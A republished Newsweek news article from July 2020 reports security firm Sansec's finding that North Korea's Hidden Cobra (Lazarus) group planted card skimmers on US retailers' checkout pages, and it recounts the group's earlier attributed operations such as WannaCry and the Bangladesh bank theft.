North Korean hackers are now stealing U.S. shoppers’ credit card details
08 Jul 2020

Hackers with suspected ties to the North Korean regime are intercepting and stealing U.S. shoppers’ credit card details during online payments.

Cybercriminals with links to a state-sponsored unit known as “Hidden Cobra” have been breaking into the websites of “large U.S retailers” and planting “skimmers” since at least May 2019, according to research released today by security firm Sansec.

Skimming is the interception of details during online purchases, and is often referred to as a “magecart” attack. The process involves injecting malicious code into the store’s checkout page—directly or via third-party providers—then lurking for victims.

In this instance, Hidden Cobra’s hackers were targeting card numbers being processed as customers were making online orders, exfiltrating data to hijacked servers and likely selling the information for illicit profit on dark web markets, Sansec said.

Some legitimate websites being exploited to “harvest” payment data included an Italian modeling agency and a family-run book store located in the state of New Jersey.

The researchers identified multiple targets of the campaign, including the fashion chain Claire’s, as well as businesses called Paper Source and Focus Camera.

“This… fraud has been growing since 2015 and was traditionally dominated by Russian and Indonesian-speaking hacker groups. This is no longer the case, as the criminals now face competition from their North Korean counterparts,” Sansec said.

Hidden Cobra, which is also known as the Lazarus Group, has been active since at least 2009, industry analysis suggests. One fork of the state-backed hacking unit, often called Bluenoroff, is believed to be solely dedicated to financial crime.

In its report released today, Sansec said its team attributed activity to Hidden Cobra because the hackers reused infrastructure from previous hacking operations. Research found “distinctive patterns in the malware code” as further evidence, it noted.

A full list of victimized organizations has not been made public.

Hackers aligned to the group—commonly referred to as an advanced persistent threat (APT)—have been tied to a series of criminal heists in recent years, including the 2014 Sony Pictures hack and the “WannaCry” ransomware outbreak in 2017.

North Korea appeared linked to the infiltration of the Bangladesh central bank in 2016 in which hackers stole $81 million by tampering with the SWIFT network. In recent years, Hidden Cobra has had cryptocurrencies and bitcoin in its crosshairs, experts say.

By Jason Murdock, Newsweek, 6 July 2020

Read more at Newsweek

Photo (edited): Gilad Rom [CC BY-NC 2.0] via Flickr

RiskScreen: Eliminating Financial Crime with Smart Technology

Count this content towards your CPD minutes, by signing up to our CPD Wallet